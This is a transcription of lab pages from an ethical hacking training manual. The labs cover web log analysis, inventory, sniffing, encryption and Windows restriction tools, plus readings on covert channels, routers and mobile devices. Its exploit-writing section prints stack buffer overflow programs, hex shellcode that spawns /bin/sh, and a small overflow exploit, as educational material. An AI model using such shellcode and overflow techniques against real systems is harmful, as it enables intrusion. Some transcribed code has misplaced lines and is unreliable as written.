Module 26. Penetration Testing

Transcription

1 Module 26 Penetration Testing Page 633 Ethical Hacking and Countermeasures v6 Copyright

2 Lab Objective: Use Azure Web Log to know details about your web traffic In the CEHv6 Labs CD-ROM, navigate to Module 26 Install and Launch Azure Web Log Start a New Project from Project -> New. Enter the data and click Ok Page 634 Ethical Hacking and Countermeasures v6 Copyright

3 Start a New Log File from File -> Add Log Page 635 Ethical Hacking and Countermeasures v6 Copyright

4 Click Hits and Refs Click Site Info Page 636 Ethical Hacking and Countermeasures v6 Copyright

5 Click Current Month Click Previous Month Page 637 Ethical Hacking and Countermeasures v6 Copyright

6 Click Year Hits Click Hour Page 638 Ethical Hacking and Countermeasures v6 Copyright

7 Click System Country Page 639 Ethical Hacking and Countermeasures v6 Copyright

8 Lab Objective: Use iinventory to capture hardware & software inventory and registry keys without having to leave your desk. In the CEHv6 Labs CD-ROM, navigate to Module 26 Install and launch iinventory Click button Audit this PC in the left side pane. To start performance audit Page 640 Ethical Hacking and Countermeasures v6 Copyright

9 Performance Audit Report Click Scan Network button on the left side pane. Page 641 Ethical Hacking and Countermeasures v6 Copyright

10 Click Agent Builder Wizard on the left pane Set the options and click Next to forward to the next step Click Show Agent Config button on the left side pane Select an agent file from the list to display its summary Page 642 Ethical Hacking and Countermeasures v6 Copyright

11 Page 643 Ethical Hacking and Countermeasures v6 Copyright

12 Summary of agent configuration Page 644 Ethical Hacking and Countermeasures v6 Copyright

13 Lab Objective: Use Link Utility to check links on Web sites and sustaining their efficiency. In the CEHv6 Labs CD-ROM, navigate to Module 26 Install and launch Link Utility Click New Project button Page 645 Ethical Hacking and Countermeasures v6 Copyright

14 Click Import from HTML File. Select a file to import site addresses from. Click Ok Page 646 Ethical Hacking and Countermeasures v6 Copyright

15 Click Settings button to change the present options Page 647 Ethical Hacking and Countermeasures v6 Copyright

16 Click Scan button. Click Yes Page 648 Ethical Hacking and Countermeasures v6 Copyright

17 Page 649 Ethical Hacking and Countermeasures v6 Copyright

18 Click on the Report to generate the report file Page 650 Ethical Hacking and Countermeasures v6 Copyright

19 Lab Objective: Use MaxCrypt to perform automated computer encryption. In the CEHv6 Labs CD-ROM, navigate to Module 26 Install and launch MaxCrypt Click on New User to create a New User Now Login Page 651 Ethical Hacking and Countermeasures v6 Copyright

20 Click on the MaxCrypt icon in the windows system tray to access the MaxCrypt Quick Menu Click on Manage Volumes Page 652 Ethical Hacking and Countermeasures v6 Copyright

21 Click on Create Volume button to create a new volume Enter the data and click Create Volume Page 653 Ethical Hacking and Countermeasures v6 Copyright

22 The New Volume F:\ is created Page 654 Ethical Hacking and Countermeasures v6 Copyright

23 Click on the MaxCrypt icon in the windows system tray to access the MaxCrypt Quick Menu Click on Conceal Files Page 655 Ethical Hacking and Countermeasures v6 Copyright

24 Select a file and click Add button Page 656 Ethical Hacking and Countermeasures v6 Copyright

25 Finally Logout user Lab Objective: Use Sniffem for monitoring network and capturing data traffic. In the CEHv6 Labs CD-ROM, navigate to Module 26 Install and launch Sniffem Page 657 Ethical Hacking and Countermeasures v6 Copyright

26 Page 658 Ethical Hacking and Countermeasures v6 Copyright

27 Click Settings button to modify the present settings Click Capture button to start capturing the activities Click Stop button to stop capturing Page 659 Ethical Hacking and Countermeasures v6 Copyright

28 Lab Objective: Use SQL Stripes to monitor and control your SQL Servers. In the CEHv6 Labs CD-ROM, navigate to Module 26 Install and Launch SQL Stripes Click Yes Page 660 Ethical Hacking and Countermeasures v6 Copyright

29 Select Settings to modify the present options Page 661 Ethical Hacking and Countermeasures v6 Copyright

30 Select Server from the left side pane in the above window and click + symbol button in the right side pane to create a new server Enter details and click OK to create a new server Page 662 Ethical Hacking and Countermeasures v6 Copyright

31 Server 1 Created Check the Console Page 663 Ethical Hacking and Countermeasures v6 Copyright

32 Lab Objective: Use TraceRoute Program to know the route over the network between two systems, listing of all the intermediate routers connected to its destination. In the CEHv6 Labs CD-ROM, navigate to Module 26 Install and launch TraceRoute Input URL in the Address bar. Click Trace Page 664 Ethical Hacking and Countermeasures v6 Copyright

33 Trace Result Repeat the same for other sites Page 665 Ethical Hacking and Countermeasures v6 Copyright

34 Lab Objective: Use Windows Security Officer to restrict the resources for an application In the CEHv6 Labs CD-ROM, navigate to Module 26 Install and Launch Windows Security Officer Initially click to change the administrator password Page 666 Ethical Hacking and Countermeasures v6 Copyright

35 Expand System 10 options in the left side pane Select Control Panel to modify the options Page 667 Ethical Hacking and Countermeasures v6 Copyright

36 Select Shell Restrictions to modify the options Select IE Browser Security to modify the options Page 668 Ethical Hacking and Countermeasures v6 Copyright

37 Page 669 Ethical Hacking and Countermeasures v6 Copyright

38 Select IE Cookies Viewer to modify the options Select Log User Activity to modify the options Page 670 Ethical Hacking and Countermeasures v6 Copyright

39 Select Restrict User Work Time to modify the options Select Folder Guard to modify the options Page 671 Ethical Hacking and Countermeasures v6 Copyright

40 Lab In the CEHv6 Labs CD-ROM, navigate to Module 26 Open the Penetration Testing.pdf and read the content Develop a penetration test plan Page 672 Ethical Hacking and Countermeasures v6 Copyright

41 Lab In the CEHv6 Labs CD-ROM, navigate to Module 26 Open the Software Penetration Testing.pdf and read the content Penetration testing today Page 673 Ethical Hacking and Countermeasures v6 Copyright

42 Module 27 Covert Hacking Page 674 Ethical Hacking and Countermeasures v6 Copyright

43 Lab In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Covert Channel Analysis and Data Hiding in TCPIP.pdf and read the content Covert Channels Page 675 Ethical Hacking and Countermeasures v6 Copyright

44 Lab In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf and read the content Firewall Piercing (Inside-Out Attacks) In the same PDF file, read the Examples of Covert Channel Attacks topic Page 676 Ethical Hacking and Countermeasures v6 Copyright

45 Lab In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Covert Actions.pdf and read the content Covert channels are the principle enablers in a DDoS attack Page 677 Ethical Hacking and Countermeasures v6 Copyright

46 Lab In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Covert channel vulnerabilities in anonymity systems.pdf and read the content Covert channels Page 678 Ethical Hacking and Countermeasures v6 Copyright

47 Module 30 Exploit Writing Page 679 Ethical Hacking and Countermeasures v6 Copyright

48 Lab In the CEHv6 Labs CD-ROM, navigate to Module 30 Boot your computer using the BackTrack CD-ROM Open command shell and type: kedit example1.c Type the following in kedi: void function(int a, int b, int c) { char buffer1[5]; char buffer2[10]; } void main() { function(1,2,3); } Page 680 Ethical Hacking and Countermeasures v6 Copyright

49 Save the program in kedit. Compile the program by typing: $ gcc -S -o example1.s example1.c Page 681 Ethical Hacking and Countermeasures v6 Copyright

50 View the generated assembly file by typing: kedit example1.s Page 682 Ethical Hacking and Countermeasures v6 Copyright

51 Lab example2.c In the CEHv6 Labs CD-ROM, navigate to Module 30 Create another program in kedit. Kedit example2.c Type the following: void function(char *str) { char buffer[16]; } strcpy(buffer,str); void main() { char large_string[256]; int i; for( i = 0; i < 255; i++) large_string[i] = 'A'; } function(large_string); Page 683 Ethical Hacking and Countermeasures v6 Copyright

52 Save the program in kedit. Page 684 Ethical Hacking and Countermeasures v6 Copyright

53 Compile the program by typing: $ gcc -o example2.s example2.c Page 685 Ethical Hacking and Countermeasures v6 Copyright

54 Run the program by typing:./example2.s Page 686 Ethical Hacking and Countermeasures v6 Copyright

55 You should see a segmentation fault error Page 687 Ethical Hacking and Countermeasures v6 Copyright

56 View the generated assembly file by typing: kedit example2.asm Page 688 Ethical Hacking and Countermeasures v6 Copyright

57 Lab Objective: example3.c In the CEHv6 Labs CD-ROM, navigate to Module 30 Create another program in kedit. Kedit example3.c Type the following: void function(int a, int b, int c) { char buffer1[5]; char buffer2[10]; int *ret; ret = buffer1 + 12; (*ret) += 8; } void main() { int x; x = 0; function(1,2,3); x = 1; printf("%d\n",x); } Page 689 Ethical Hacking and Countermeasures v6 Copyright

58 Save the program and compile it by typing: $gcc o example3 example3.c Page 690 Ethical Hacking and Countermeasures v6 Copyright

59 Run the program by typing: $./example3 Page 691 Ethical Hacking and Countermeasures v6 Copyright

60 It should print one Disassemble main using gdb Type the following: $gdb example3 Page 692 Ethical Hacking and Countermeasures v6 Copyright

61 Type: disassemble main Page 693 Ethical Hacking and Countermeasures v6 Copyright

62 Page 694 Ethical Hacking and Countermeasures v6 Copyright

63 Lab Objective: shellcode.c In the CEHv6 Labs CD-ROM, navigate to Module 26 Create another program in kedit Kedit shellcode.c Type the following: #include <stdio.h> void main() { char *name[2]; } name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); Page 695 Ethical Hacking and Countermeasures v6 Copyright

64 Compile the program by typing: $ gcc -o shellcode -ggdb -static shellcode.c Page 696 Ethical Hacking and Countermeasures v6 Copyright

65 Type: $ gdb shellcode Then, type disassemble main. Page 697 Ethical Hacking and Countermeasures v6 Copyright

66 Type disassemble _execve Page 698 Ethical Hacking and Countermeasures v6 Copyright

67 Page 699 Ethical Hacking and Countermeasures v6 Copyright

68 Lab Objective: exit.c In the CEHv6 Labs CD-ROM, navigate to Module 26 Create another program in kedit. Kedit exit.c Type the following: #include <stdlib.h> void main() { } exit(0); Compile the program using: $ gcc -o exit -static exit.c View the generated code gdb by typing: gdb exit Then: disassemble _exit Page 700 Ethical Hacking and Countermeasures v6 Copyright

69 Lab Objective: testsc.c In the CEHv6 Labs CD-ROM, navigate to Module 26 Create another program in kedit. Kedit testsc.c Type the following: char shellcode[] = "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x 00\x00" "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\x cd\x80" "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\x ff\xff" "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3"; void main() { int *ret; ret = (int *)&ret + 2; (*ret) = (int)shellcode; } Compile the program using: $ gcc -o testsc testsc.c Run the program by typing:./testsc You should see a shell launched. Type exit to exit the shell. Page 701 Ethical Hacking and Countermeasures v6 Copyright

70 Lab Objective: exploit.c In the CEHv6 Labs CD-ROM, navigate to Module 26 Create another program in kedit Kedit exploit.c Type the following: char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b " "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd " "\x80\xe8\xdc\xff\xff\xff/bin/sh"; char large_string[128]; void main() { } char buffer[96]; int i; long *long_ptr = (long *) large_string; for (i = 0; i < 32; i++) *(long_ptr + i) = (int) buffer; for (i = 0; i < strlen(shellcode); i++) large_string[i] = shellcode[i]; strcpy(buffer,large_string); Compile the program using: $ gcc -o exploit exploit.c Run the program by typing:./exploit You should see a shell launched Type exit to exit the shell Page 702 Ethical Hacking and Countermeasures v6 Copyright

71 Module 34 Mac OS X Hacking Page 703 Ethical Hacking and Countermeasures v6 Copyright

72 Lab In the CEHv6 Labs CD-ROM, navigate to Module 34 Open the Securing Mac OS X.pdf and read the content Read the Security Hardening Guideline topic Page 704 Ethical Hacking and Countermeasures v6 Copyright

73 In the same PDF file, read the Data Encryption topic Page 705 Ethical Hacking and Countermeasures v6 Copyright

74 Lab In the CEHv6 Labs CD-ROM, navigate to Module 34 Open the Security in Mac OS X.pdf and read the content Read the Secure Default Settings topic Page 706 Ethical Hacking and Countermeasures v6 Copyright

75 In the same PDF file, read the Modern Security Architecture topic Page 707 Ethical Hacking and Countermeasures v6 Copyright

76 Next, read the Strong Authentication topic Page 708 Ethical Hacking and Countermeasures v6 Copyright

77 Lab In the CEHv6 Labs CD-ROM, navigate to Module 34 Open the Mac OS X 10.4 Security Checklist.pdf and read the content Read the OS X Security Architecture topic Page 709 Ethical Hacking and Countermeasures v6 Copyright

78 In the same PDF file, read the User Account Security topic Page 710 Ethical Hacking and Countermeasures v6 Copyright

79 Next, read the Securing System Preferences topic Page 711 Ethical Hacking and Countermeasures v6 Copyright

80 Lab In the CEHv6 Labs CD-ROM, navigate to Module 34 Open the Mac OS X Hacking Poses Wide Risk to Windows.pdf and read the content Read the Mac OS X Hacking Poses Wide Risk for Windows topic Page 712 Ethical Hacking and Countermeasures v6 Copyright

81 Module 35 Hacking Routers, Cable Modems, and Firewalls Page 713 Ethical Hacking and Countermeasures v6 Copyright

82 Lab In the CEHv6 Labs CD-ROM, navigate to Module 35 Open the Chapter 9-Firewalls.pdf and read the content Read the FIREWALL IDENTIFICATION topic Page 714 Ethical Hacking and Countermeasures v6 Copyright

83 Next, read the PACKET FILTERING topic Page 715 Ethical Hacking and Countermeasures v6 Copyright

84 Lab In the CEHv6 Labs CD-ROM, navigate to Module 35 Open the CISCO ROUTERS AS TARGETS.pdf and read the content Read the Compromised Router Sniffing topic Page 716 Ethical Hacking and Countermeasures v6 Copyright

85 In the same PDF file, read the Why we need to protect router resources topic Next, read the Router Audit Tool topic Page 717 Ethical Hacking and Countermeasures v6 Copyright

86 Lab In the CEHv6 Labs CD-ROM, navigate to Module 35 Open the Cisco Router Security Best Practices.pdf and read the content Read the Access management topic Page 718 Ethical Hacking and Countermeasures v6 Copyright

87 In the same PDF file, read the SNTP Security topic Page 719 Ethical Hacking and Countermeasures v6 Copyright

88 Next, read the Access control lists topic Page 720 Ethical Hacking and Countermeasures v6 Copyright

89 Lab In the CEHv6 Labs CD-ROM, navigate to Module 35 Open the 8 steps to protect your Cisco router.pdf and read the content Page 721 Ethical Hacking and Countermeasures v6 Copyright

90 In the same PDF file, read the Encrypt all passwords topic Page 722 Ethical Hacking and Countermeasures v6 Copyright

91 Module 36 Hacking Mobile Phones, PDA, and Handheld Devices Page 723 Ethical Hacking and Countermeasures v6 Copyright

92 Lab In the CEHv6 Labs CD-ROM, navigate to Module 36 Open the Take Control of Your iphone.pdf and read the content Read the QUICK START TO TAKING CONTROL OF AN iphone topic Page 724 Ethical Hacking and Countermeasures v6 Copyright

93 In the same PDF file, read the 8 QUICK TROUBLESHOOTING STEPS topic Page 725 Ethical Hacking and Countermeasures v6 Copyright

94 Next, read the AVOID NAVIGATION AND TYPING HASSLES topic Page 726 Ethical Hacking and Countermeasures v6 Copyright

95 Lab In the CEHv6 Labs CD-ROM, navigate to Module 36 Open the iphone Hardware Unlock.pdf and read the content Page 727 Ethical Hacking and Countermeasures v6 Copyright

96 Lab In the CEHv6 Labs CD-ROM, navigate to Module 36 Open the How to Unlock an iphone.pdf and read the content Page 728 Ethical Hacking and Countermeasures v6 Copyright

97 Lab In the CEHv6 Labs CD-ROM, navigate to Module 36 Open the The Anatomy of a Hack.pdf and read the content. Read the Understanding the Threats to Your Mobile Workforce topic Page 729 Ethical Hacking and Countermeasures v6 Copyright

98 In the same PDF file, read the Anatomy of a Hack Video Companion Guide topic Page 730 Ethical Hacking and Countermeasures v6 Copyright

99 Lab In the CEHv6 Labs CD-ROM, navigate to Module 36 Open the Mobile Handset Security.pdf and read the content Read the Security issues on mobile devices topic Page 731 Ethical Hacking and Countermeasures v6 Copyright

100 In the same PDF file, read the Threats and Attacks topic Page 732 Ethical Hacking and Countermeasures v6 Copyright

101 Lab In the CEHv6 Labs CD-ROM, navigate to Module 36 Open the Mobile Malware Threats and Prevention.pdf and read the content Page 733 Ethical Hacking and Countermeasures v6 Copyright